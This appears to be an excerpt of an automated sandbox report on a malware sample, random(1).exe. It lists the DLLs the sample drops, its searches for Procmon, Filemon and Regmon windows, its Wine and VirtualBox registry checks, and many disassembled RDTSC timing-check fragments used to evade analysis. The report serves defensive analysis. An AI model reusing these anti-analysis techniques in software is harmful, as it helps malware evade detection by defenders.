Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\freebl3[1].dll
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\vcruntime140.dll
Source: C:\Users\user\Desktop\random(1).exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\softokn3[1].dll
Source: C:\Users\user\Desktop\random(1).exe File created: C:\ProgramData\softokn3.dll

Boot Survival

Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\random(1).exe Window searched: window name: Regmonclass

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\random(1).exe File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\random(1).exe File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1050836 second address: 105083F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 105083F second address: 1050869 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F06D8B4D9D7h 0x0000000c js 00007F06D8B4D9CCh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1050A19 second address: 1050A1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1050A1D second address: 1050A45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f pop edx 0x00000010 jmp 00007F06D8B4D9D8h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1050C96 second address: 1050C9B instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053AF1 second address: 1053B1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 nop 0x00000007 call 00007F06D8B4D9CBh 0x0000000c sbb ecx, 225FCE12h 0x00000012 pop esi 0x00000013 push 00000000h 0x00000015 pushad 0x00000016 clc 0x00000017 mov ecx, dword ptr [ebp+122D2C1Bh] 0x0000001d popad 0x0000001e push 8C040BB4h 0x00000023 push esi 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053B1F second address: 1053B23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053B23 second address: 1053B27 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053B27 second address: 1053B6A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 add dword ptr [esp], 73FBF4CCh 0x0000000e mov edi, esi 0x00000010 push 00000003h 0x00000012 sub dh, FFFFFF8Fh 0x00000015 jng 00007F06D851854Bh 0x0000001b or dx, FDD8h 0x00000020 push 00000000h 0x00000022 mov dword ptr [ebp+122D3880h], eax 0x00000028 push 00000003h 0x0000002a jnl 00007F06D851854Bh 0x00000030 mov esi, 1AAF121Ch 0x00000035 push 84069BB0h 0x0000003a push ebx 0x0000003b push eax 0x0000003c push edx 0x0000003d jng 00007F06D8518546h 0x00000043 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053C15 second address: 1053C8C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 xor dword ptr [esp], 76A3BBD7h 0x0000000e mov dx, si 0x00000011 push 00000003h 0x00000013 jmp 00007F06D8B4D9D6h 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push edi 0x0000001d call 00007F06D8B4D9C8h 0x00000022 pop edi 0x00000023 mov dword ptr [esp+04h], edi 0x00000027 add dword ptr [esp+04h], 00000019h 0x0000002f inc edi 0x00000030 push edi 0x00000031 ret 0x00000032 pop edi 0x00000033 ret 0x00000034 push 00000003h 0x00000036 mov edi, 22C85492h 0x0000003b call 00007F06D8B4D9C9h 0x00000040 jmp 00007F06D8B4D9D1h 0x00000045 push eax 0x00000046 jbe 00007F06D8B4D9D4h 0x0000004c pushad 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053C8C second address: 1053CA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F06D8518546h 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 push eax 0x00000011 push edx 0x00000012 jg 00007F06D8518546h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053CA4 second address: 1053CAD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053CAD second address: 1053CBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push esi 0x0000000e pop esi 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053D7B second address: 1053D7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053D7F second address: 1053D85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053D85 second address: 1053DE5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a mov dh, ah 0x0000000c mov dx, di 0x0000000f push 00000000h 0x00000011 jmp 00007F06D8B4D9CEh 0x00000016 call 00007F06D8B4D9C9h 0x0000001b pushad 0x0000001c js 00007F06D8B4D9C8h 0x00000022 pushad 0x00000023 popad 0x00000024 pushad 0x00000025 jmp 00007F06D8B4D9CBh 0x0000002a pushad 0x0000002b popad 0x0000002c popad 0x0000002d popad 0x0000002e push eax 0x0000002f jc 00007F06D8B4D9CAh 0x00000035 push ecx 0x00000036 push edx 0x00000037 pop edx 0x00000038 pop ecx 0x00000039 mov eax, dword ptr [esp+04h] 0x0000003d pushad 0x0000003e pushad 0x0000003f ja 00007F06D8B4D9C6h 0x00000045 push eax 0x00000046 push edx 0x00000047 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053DE5 second address: 1053DEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1053DEF second address: 1053E13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [eax] 0x00000008 ja 00007F06D8B4D9CCh 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 mov dword ptr [esp+04h], eax 0x00000018 pushad 0x00000019 push esi 0x0000001a jng 00007F06D8B4D9C6h 0x00000020 pop esi 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107388F second address: 1073893 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073893 second address: 1073897 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073897 second address: 107389D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107389D second address: 1073904 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F06D8B4D9D1h 0x00000008 jmp 00007F06D8B4D9CFh 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 jmp 00007F06D8B4D9CEh 0x00000015 pop edx 0x00000016 pop eax 0x00000017 pushad 0x00000018 push edi 0x00000019 jmp 00007F06D8B4D9D6h 0x0000001e pop edi 0x0000001f jmp 00007F06D8B4D9CEh 0x00000024 pushad 0x00000025 push ebx 0x00000026 pop ebx 0x00000027 pushad 0x00000028 popad 0x00000029 popad 0x0000002a push eax 0x0000002b push edx 0x0000002c pushad 0x0000002d popad 0x0000002e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073A66 second address: 1073A7A instructions: 0x00000000 rdtsc 0x00000002 jc 00007F06D851854Ah 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push edi 0x00000013 pop edi 0x00000014 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073A7A second address: 1073AAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8B4D9D8h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073AAB second address: 1073AAF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073AAF second address: 1073AB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073C06 second address: 1073C0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073C0A second address: 1073C13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073C13 second address: 1073C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073C1D second address: 1073C22 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073C22 second address: 1073C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073C28 second address: 1073C2C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073D8D second address: 1073D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073EBE second address: 1073ECE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F06D8B4D9C6h 0x0000000a jnl 00007F06D8B4D9C6h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1073ECE second address: 1073ED2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1074191 second address: 1074197 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1074197 second address: 10741B5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F06D8518550h 0x0000000a push ecx 0x0000000b jnc 00007F06D8518546h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10746F4 second address: 107471B instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jmp 00007F06D8B4D9D9h 0x00000008 pop ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jne 00007F06D8B4D9C6h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107471B second address: 107471F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10749AC second address: 10749C1 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F06D8B4D9CBh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10749C1 second address: 10749C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10749C5 second address: 10749C9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 106B72F second address: 106B74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F06D8518559h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 106B74C second address: 106B77C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007F06D8B4D9CAh 0x0000000e push ecx 0x0000000f pushad 0x00000010 popad 0x00000011 pushad 0x00000012 popad 0x00000013 pop ecx 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 pop eax 0x00000018 jne 00007F06D8B4D9C6h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 103E5FE second address: 103E606 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 103E606 second address: 103E60C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 103E60C second address: 103E610 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 103E610 second address: 103E62C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9D0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jo 00007F06D8B4D9CCh 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107503A second address: 1075044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1075044 second address: 107504A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107504A second address: 107504E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107578A second address: 107579D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8B4D9CBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107579D second address: 10757A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10757A1 second address: 10757A7 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107AED7 second address: 107AF03 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518553h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F06D8518553h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107AF03 second address: 107AF07 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107B2EE second address: 107B314 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D851854Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d ja 00007F06D8518550h 0x00000013 jmp 00007F06D851854Ah 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107B58B second address: 107B5B0 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F06D8B4D9D8h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push edi 0x0000000f pop edi 0x00000010 pushad 0x00000011 popad 0x00000012 popad 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107B5B0 second address: 107B5D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F06D8518555h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jc 00007F06D8518546h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107B5D6 second address: 107B5EE instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 pushad 0x00000008 popad 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c popad 0x0000000d mov eax, dword ptr [eax] 0x0000000f push ecx 0x00000010 jo 00007F06D8B4D9CCh 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107F297 second address: 107F2A4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jnc 00007F06D8518546h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 107F2A4 second address: 107F2B1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F06D8B4D9CCh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1039674 second address: 1039689 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 jns 00007F06D8518548h 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 103CB3E second address: 103CB55 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnl 00007F06D8B4D9C6h 0x00000009 pushad 0x0000000a popad 0x0000000b jnc 00007F06D8B4D9C6h 0x00000011 popad 0x00000012 push ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108346E second address: 1083495 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jmp 00007F06D8518557h 0x0000000d ja 00007F06D8518552h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10835F9 second address: 10835FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10835FF second address: 1083605 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1083605 second address: 1083609 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1083609 second address: 1083612 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1083612 second address: 108361E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F06D8B4D9C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1083774 second address: 108378D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F06D8518555h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084580 second address: 1084585 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084585 second address: 108458A instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084686 second address: 1084692 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, dword ptr [eax] 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b pop edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084692 second address: 1084696 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084696 second address: 108469F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084C72 second address: 1084C76 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084D22 second address: 1084D2C instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F06D8B4D9C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084D2C second address: 1084D45 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop esi 0x00000005 jng 00007F06D8518546h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jns 00007F06D8518548h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084D45 second address: 1084D4B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084D4B second address: 1084D4F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1084D4F second address: 1084D53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 10851BC second address: 10851C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 108524E second address: 1085253 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\random(1).exe RDTSC instruction interceptor: First address: 1085253 second address: 1085259 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
